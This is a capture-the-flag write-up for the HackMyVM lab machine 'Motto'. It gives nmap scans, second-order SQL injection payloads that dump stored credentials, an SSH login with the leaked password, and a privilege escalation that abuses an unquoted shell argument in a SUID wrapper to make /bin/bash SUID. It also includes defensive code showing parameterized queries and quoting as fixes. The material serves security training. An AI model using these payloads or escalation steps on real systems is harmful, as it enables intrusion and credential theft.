Motto

Target description

I. Information gathering

1. Host discovery

This target has a fixed IP address, so a subnet sweep with nmap is not used here; the VM console shows its address as 192.168.2.9.

2. Port scanning

1) Full TCP port scan

┌──(root㉿kali)-[~]
└─# nmap --min-rate 10000 -p- 192.168.2.9
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-09-04 11:24 CST
Nmap scan report for 192.168.2.9
Host is up (0.00029s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
9090/tcp open zeus-admin
MAC Address: 08:00:27:8C:F9:3A (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 5.56 seconds

Open ports: 22, 80, 9090

2) Service and version detection

┌──(root㉿kali)-[~]
└─# nmap --min-rate 10000 -sT -sV -sC -O -p22,80,9090 192.168.2.9
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-09-04 11:27 CST
Nmap scan report for 192.168.2.9
Host is up (0.0015s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey:
| 3072 f6:a3:b6:78:c4:62:af:44:bb:1a:a0:0c:08:6b:98:f7 (RSA)
| 256 bb:e8:a2:31:d4:05:a9:c9:31:ff:62:f6:32:84:21:9d (ECDSA)
|_ 256 3b:ae:34:64:4f:a5:75:b9:4a:b9:81:f9:89:76:99:eb (ED25519)
80/tcp open http Apache httpd 2.4.62 ((Debian))
|_http-title: \xE7\x82\xB9\xE5\x87\xBB\xE6\x96\xB9\xE5\x9D\x97\xE5\xB0\x8F\xE6\xB8\xB8\xE6\x88\x8F
|_http-server-header: Apache/2.4.62 (Debian)
9090/tcp open zeus-admin?
| fingerprint-strings:
| GenericLines, SqueezeCenter_CLI:
| HTTP/1.1 400 Bad Request
| Content-Type: text/plain; charset=utf-8
| Connection: close
| Request
| GetRequest:
| HTTP/1.0 200 OK
| Content-Type: text/html; charset=utf-8
| Date: Thu, 04 Sep 2025 03:28:00 GMT
| <!DOCTYPE html>
| <html lang="zh-CN">
| <head>
| <meta charset="UTF-8" />
| <title>Mottos</title>
| <link rel="stylesheet" href="/static/css/index.css" />
| <style>
| .top-right-auth {
| position: fixed;
| top: 20px;
| right: 30px;
| font-size: 14px;
| font-family: Arial, sans-serif;
| z-index: 1000;
| .top-right-auth a, .top-right-auth button {
| color: #2980b9;
| text-decoration: none;
| margin-left: 10px;
| font-weight: 600;
| border: 1.5px solid #2980b9;
| padding: 6px 14px;
| border-radius: 20px;
| background: none;
| cursor: pointer;
|_ transition: background-color 0.3s,
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
...
MAC Address: 08:00:27:8C:F9:3A (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 135.01 seconds

3) UDP port scan

┌──(root㉿kali)-[~]
└─# nmap -sU --top-ports 100 192.168.2.9
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-09-04 14:38 CST
Nmap scan report for 192.168.2.9
Host is up (0.00062s latency).
All 100 scanned ports on 192.168.2.9 are in ignored states.
Not shown: 61 closed udp ports (port-unreach), 39 open|filtered udp ports (no-response)
MAC Address: 08:00:27:8C:F9:3A (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 59.18 seconds

No UDP port is confirmed open: 61 answered with port-unreachable and the remaining 39 are open|filtered (no response), which nmap cannot tell apart from filtered.

4) Vulnerability script scan

┌──(root㉿kali)-[~]
└─# nmap --script=vuln -p22,80,9090 192.168.2.9
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-09-04 14:21 CST
Nmap scan report for 192.168.2.9
Host is up (0.00033s latency).

PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
9090/tcp open zeus-admin
MAC Address: 08:00:27:8C:F9:3A (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 31.53 seconds

Nothing further of use here.

II. Web penetration

1. Port 80 - Apache

Port 80 serves a small game (the http-title that nmap printed as escaped UTF-8 decodes to 点击方块小游戏, "click-the-blocks mini game"). Nothing useful turned up in the page source or from directory brute-forcing.

2. Port 9090

Port 9090 hosts a message board ("Mottos"). Trying to post a motto prompts for a login, so register an account and log in.

Write a motto, then open "my Motto": the motto just written is displayed.

Change the nickname to sunset and open "my Motto" again: sunset's motto is displayed. The lookup is therefore keyed on the nickname stored in the profile, not on the logged-in account.

Change the nickname to sunset' and nothing is displayed (the quote breaks the query).
Change it to sunset' -- a and the motto is displayed again (the comment discards the rest of the query).
So the nickname is inserted into a SQL string literal unescaped: a SQL injection where the payload is saved in the profile and executed each time "my Motto" is viewed.

III. Exploitation

1. SQL injection - UNION-based

1) Find the number of columns

sunset' order by 3 -- a

The page still renders, so the query selects at least three columns (order by 3 succeeds); the UNION below confirms exactly three.

2) List all databases

sunset' union select 1,2,group_concat(schema_name) from information_schema.schemata -- a

Succeeds, and the third column is reflected in the page.

3) List the tables in the current database

sunset' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()-- a

Two table names are returned; one of them is register_infos.

4) Columns of register_infos

sunset' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='register_infos'-- a

The column names come back, including username and password.

5) Dump username and password from register_infos

sunset' union select 1,username,password from register_infos; -- a

The rows come back: user RedBean with password cannotforgetyou.
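As an added illustration (this is not code from the Motto VM or from its author), the Python model below uses sqlite3 to reproduce what the port-9090 lookup must be doing: the nickname saved in the profile is spliced into the "my Motto" query as text. The register_infos table and its username/password columns are taken from the writeup; the mottos table, the query text, the sentinel value -1 and all sample rows except RedBean's are assumptions. It reproduces the rows/blank/error oracle from the three nickname probes, walks the ORDER BY and UNION steps (using sqlite_master where the writeup used information_schema), and shows that the same payloads are inert once the nickname is bound as a parameter.

```python
import sqlite3

# The lookup the app appears to run when "my Motto" is opened (assumed text).
VULN_QUERY = "SELECT id, nickname, motto FROM mottos WHERE nickname = '{}'"
SAFE_QUERY = "SELECT id, nickname, motto FROM mottos WHERE nickname = ?"


def make_db() -> sqlite3.Connection:
    """Constructed sample data standing in for the app's MySQL database.
    register_infos / username / password are from the writeup; the mottos
    table and every value except RedBean's are made up for this example."""
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE register_infos (id INTEGER PRIMARY KEY, username TEXT, password TEXT);
        CREATE TABLE mottos (id INTEGER PRIMARY KEY, nickname TEXT, motto TEXT);
        INSERT INTO register_infos (username, password)
            VALUES ('sunset', 'sunset-pass'), ('RedBean', 'cannotforgetyou');
        INSERT INTO mottos (nickname, motto)
            VALUES ('sunset', 'keep going'), ('attacker', 'hello');
    """)
    return con


def lookup_vulnerable(con, nickname):
    """The bug: the stored nickname is pasted into the SQL text, so a quote
    in it ends the string literal and whatever follows becomes SQL."""
    return con.execute(VULN_QUERY.format(nickname)).fetchall()


def lookup_safe(con, nickname):
    """Same lookup with a bound parameter: the nickname is data, never SQL."""
    return con.execute(SAFE_QUERY, (nickname,)).fetchall()


def probe(con, nickname, lookup=lookup_vulnerable):
    """The oracle used in the writeup: rows back, an empty page, or an error."""
    try:
        return "rows" if lookup(con, nickname) else "empty"
    except sqlite3.OperationalError:
        return "error"


def column_count(con, max_cols=10):
    """ORDER BY n step: the first n that errors is one past the column count."""
    for n in range(1, max_cols + 1):
        if probe(con, f"sunset' order by {n} -- a") == "error":
            return n - 1
    return max_cols


def injected_rows(con, payload_select):
    """UNION the attacker's SELECT onto the lookup. -1 is used as a sentinel
    in the first column so injected rows can be told apart from real mottos."""
    rows = lookup_vulnerable(con, f"sunset' union select -1, {payload_select} -- a")
    return [(nick, motto) for _id, nick, motto in rows if _id == -1]


def list_tables(con):
    """SQLite stand-in for the information_schema.tables step of the writeup."""
    (_label, names), = injected_rows(
        con, "'tables', group_concat(name) from sqlite_master where type='table'")
    return names.split(",")


def dump_credentials(con):
    """The final step from the writeup: username/password out of register_infos."""
    return dict(injected_rows(con, "username, password from register_infos"))


if __name__ == "__main__":
    con = make_db()
    for nick in ["sunset", "sunset'", "sunset' -- a"]:
        print(f"{nick!r:18} vulnerable -> {probe(con, nick):6} "
              f"parameterized -> {probe(con, nick, lookup_safe)}")
    print("columns:", column_count(con))
    print("tables: ", list_tables(con))
    print("creds:  ", dump_credentials(con))
```

The parameterized form gives "empty" for every probe that contains a quote: the bound value is compared as a whole string, so there is no nickname equal to it and no SQL is executed from it. That, not input filtering on the nickname field, is the fix for this class of bug.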

IV. Getting a shell as redbean

Log in over SSH directly; note that the Linux account is lowercase redbean, not RedBean as stored in the database.

┌──(root㉿kali)-[/tmp]
└─# ssh redbean@192.168.2.9
redbean@192.168.2.9's password:
Linux motto 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Thu Jul 31 04:01:36 2025 from 192.168.56.103
redbean@motto:~$ id
uid=1000(redbean) gid=1000(redbean) groups=1000(redbean)

V. Privilege escalation

Check sudo rights: sudo -l asks for a password.

redbean@motto:~$ sudo -l
sudo: unable to resolve host motto: Temporary failure in name resolution

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

#1) Respect the privacy of others.
#2) Think before you type.
#3) With great power comes great responsibility.

[sudo] password for redbean:

Look for SUID binaries

redbean@motto:~$ find / -perm -u=s -type f 2>/dev/null
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/newgrp
/usr/bin/gpasswd
/usr/bin/mount
/usr/bin/su
/usr/bin/umount
/usr/bin/pkexec
/usr/bin/sudo
/usr/bin/passwd
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/libexec/polkit-agent-helper-1
/opt/run_newsh

The only entry that is not a standard system binary is /opt/run_newsh. Inspect it with strings:

redbean@motto:/opt$ strings run_newsh 
/lib64/ld-linux-x86-64.so.2
setuid
execv
perror
stderr
fprintf
__cxa_finalize
setgid
__libc_start_main
libc.so.6
GLIBC_2.2.5
_ITM_deregisterTMCloneTable
__gmon_start__
_ITM_registerTMCloneTable
u/UH
[]A\A]A^A_
Usage: %s <arg>
/opt/new.sh
execv failed
;*3$"
GCC: (Debian 10.2.1-6) 10.2.1 20210110
crtstuff.c
deregister_tm_clones
__do_global_dtors_aux
completed.0
__do_global_dtors_aux_fini_array_entry
frame_dummy
__frame_dummy_init_array_entry
run_newsh.c
...

The strings show that it calls setuid/setgid and execv, with /opt/new.sh as the target, so the SUID wrapper runs /opt/new.sh.
/opt/new.sh itself is not writable by redbean.

Search the whole filesystem for new.sh:

redbean@motto:/opt$ find / -name new.sh 2>/dev/null
/home/redbean/.backup/new.sh
/opt/new.sh

In /home/redbean/.backup there is a copy of new.sh together with the run_newsh.c source.

new.sh

redbean@motto:~/.backup$ cat new.sh 
#!/bin/bash
PATH=/usr/bin

echo -e "\033[1;35m"
echo '▓▒░ Loading system diagnostics ░▒▓'
echo -e "\033[0m"

echo -e "\033[1;34m[INFO]\033[0m Initializing environment checks:"
for step in A B C; do
echo -e "\033[1;33m ● Module ${step} status: OK (ver $(($RANDOM%5+1)).$(($RANDOM%20)).$(($RANDOM%500)))\033[0m"
sleep 0.12
done

echo "Random seed value: $RANDOM"
echo -e "\033[1;34m[INFO]\033[0m Evaluating input parameters..."
sleep 0.15

[ -n "$1" ] || exit 1
[ "$1" = "flag" ] && exit 2
[ $1 = "flag" ] && chmod +s /bin/bash

echo -e "\033[1;34m[INFO]\033[0m Running diagnostic sequence:"
for step in {1..3}; do
echo -e "\033[1;35m → Executing test ${step} of 3\033[0m"
sleep 0.2
done

WAIT_TIME=$((RANDOM%5+2))
echo -e "\033[1;36m\nWaiting period: \033[3${WAIT_TIME}m${WAIT_TIME} seconds\033[0m"

for ((i=WAIT_TIME; i>=0; i--)); do
case $((i%4)) in
0) COL="34" ;; # blue
1) COL="32" ;; # green
2) COL="31" ;; # red
3) COL="36" ;; # cyan
esac

case $((i%2)) in
0) echo -e "\033[1;${COL}m>> Waiting T-${i} seconds...\033[0m" ;;
1) echo -e "\033[1;${COL}m>> Countdown: ${i}\033[0m" ;;
esac

[ $i -gt 0 ] && sleep 1
done

RESULTS=(
"Diagnostics complete."
"All systems nominal."
"No errors detected."
"System stable."
)

FINAL_MSG=${RESULTS[$RANDOM % ${#RESULTS[@]}]}
echo -e "\033[1;32m${FINAL_MSG}\033[0m"
echo -e "\033[1;34mThank you for using the system monitor.\033[0m"

echo -e "\033[1;30m[STATS] Summary Report:\033[0m"
echo -e " Processes checked: $((RANDOM%60+20))"
echo -e " CPU load average: $(echo "scale=2; $RANDOM%10+0.5" | bc)"
echo -e " Uptime (hours): $((RANDOM%100+1))"

run_newsh.c

redbean@motto:~/.backup$ cat run_newsh.c 
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

int main(int argc, char *argv[]) {
if (argc != 2) {
fprintf(stderr, "Usage: %s <arg>\n", argv[0]);
return 1;
}

// Become root: the binary is SUID root, so this sets the real and effective uid to 0
setuid(0);
setgid(0);

// Build argv and run /opt/new.sh with the caller's argument, unchecked
char *script = "/opt/new.sh";
char *args[] = { script, argv[1], NULL };

execv(script, args); // replace this process with the script

perror("execv failed");
return 1;
}

The flaw is in the third guard of new.sh. The second guard quotes $1, so it fires only on the exact string flag and exits 2. The third guard leaves $1 unquoted, so the shell word-splits the argument on IFS (space, tab, newline) before [ runs. An argument of "flag " (trailing space) is therefore not equal to flag on the second line, but collapses to the single word flag on the third, and chmod +s /bin/bash executes. Because run_newsh called setuid(0) before execv, the script runs with real and effective uid 0, so bash does not drop privileges and the chmod succeeds.

[ -n "$1" ] || exit 1
[ "$1" = "flag" ] && exit 2
[ $1 = "flag" ] && chmod +s /bin/bash
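As an added example (not from the Motto VM or its author), the snippet below runs those three guard lines under a real /bin/sh, with the chmod replaced by exit 0 so the outcome is visible as a return code, and compares them with the quoted form. It assumes a POSIX sh at /bin/sh (dash or bash); the exit-code meanings 0/1/2/3 are the example's own convention. The probes go beyond the single trailing-space case from the writeup: any IFS whitespace (tab included, leading or trailing) gets through, while a two-word value does not.

```python
"""Run the new.sh guards under a real shell to see which arguments get past them."""
import subprocess

# The three guard lines as in new.sh; only the privileged action (chmod) is
# replaced by `exit 0` so that the result can be read from the exit status.
#   0 = reached the privileged branch, 1 = empty argument,
#   2 = stopped by the quoted guard, 3 = fell through (no match, or [ errored).
VULNERABLE_GUARDS = r'''
[ -n "$1" ] || exit 1
[ "$1" = "flag" ] && exit 2
[ $1 = "flag" ] 2>/dev/null && exit 0
exit 3
'''

# The same guards with the expansion quoted: [ now compares the exact string,
# whitespace included, so nothing that survives line 2 can match on line 3.
# (Unquoted $1 is also glob-expanded against the cwd, another way to alter it.)
FIXED_GUARDS = VULNERABLE_GUARDS.replace('[ $1 = "flag" ]', '[ "$1" = "flag" ]')


def run_guards(arg: str, fixed: bool = False) -> int:
    """Run the guard script with `arg` as $1 and return the shell's exit code.

    `sh -c SCRIPT NAME ARG` sets $0=NAME and $1=ARG, which is how execv() in
    run_newsh hands argv[1] to /opt/new.sh."""
    script = FIXED_GUARDS if fixed else VULNERABLE_GUARDS
    proc = subprocess.run(["/bin/sh", "-c", script, "new.sh", arg],
                          capture_output=True, text=True)
    return proc.returncode


def explain(rc: int) -> str:
    return {0: "PRIVILEGED BRANCH REACHED", 1: "empty argument",
            2: "blocked by quoted guard", 3: "no match"}.get(rc, "unexpected")


if __name__ == "__main__":
    # Probes: the exact keyword, IFS-padded variants, a two-word value, junk, empty.
    for probe in ["flag", "flag ", " flag", "flag\t", "flag x", "banana", ""]:
        vuln, fix = run_guards(probe), run_guards(probe, fixed=True)
        print(f"{probe!r:10} unquoted -> {vuln} ({explain(vuln)}); "
              f"quoted -> {fix} ({explain(fix)})")
```

"flag x" fails both forms for a different reason: after word-splitting, [ sees four operands and reports an error, so the && branch is skipped. That is why a stray operand does not help here and only padding whitespace does.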

Run the wrapper with a trailing space in the argument; the script then sets the SUID bit on /bin/bash:

redbean@motto:~/.backup$  /opt/run_newsh 'flag '

▓▒░ Loading system diagnostics ░▒▓

[INFO] Initializing environment checks:
● Module A status: OK (ver 4.17.190)
● Module B status: OK (ver 2.4.482)
● Module C status: OK (ver 2.5.116)
Random seed value: 26001
[INFO] Evaluating input parameters...
[INFO] Running diagnostic sequence:
→ Executing test 1 of 3
→ Executing test 2 of 3
→ Executing test 3 of 3

Waiting period: 3 seconds
>> Countdown: 3
>> Waiting T-2 seconds...
>> Countdown: 1
>> Waiting T-0 seconds...
No errors detected.
Thank you for using the system monitor.
[STATS] Summary Report:
Processes checked: 74
/opt/new.sh: line 60: bc: command not found
CPU load average:
Uptime (hours): 31

Check /bin/bash: it now carries the SUID (and SGID) bit:

redbean@motto:~/.backup$ ls -la /bin/bash
-rwsr-sr-x 1 root root 1168776 Apr 18 2019 /bin/bash

Get root: start bash with -p so it keeps the effective uid 0 instead of dropping it:

redbean@motto:~/.backup$ /bin/bash -p
bash-5.0# id
uid=1000(redbean) gid=1000(redbean) euid=0(root) egid=0(root) groups=0(root),1000(redbean)
bash-5.0# whoami
root

VI. Flags

bash-5.0# cat /home/redbean/user.txt /root/root.txt
flag{796f756765747265646265616e}
flag{796f75676574726f6f74627574796f7563616e6e6f74676574686572}

Both flags are hex-encoded ASCII: the first decodes to yougetredbean, the second to yougetrootbutyoucannotgether.

Motto
http://miao-sec.github.io/Hackmyvm/Motto/
Author: Miao
Published: 9 January 2026
License: BY-MIAO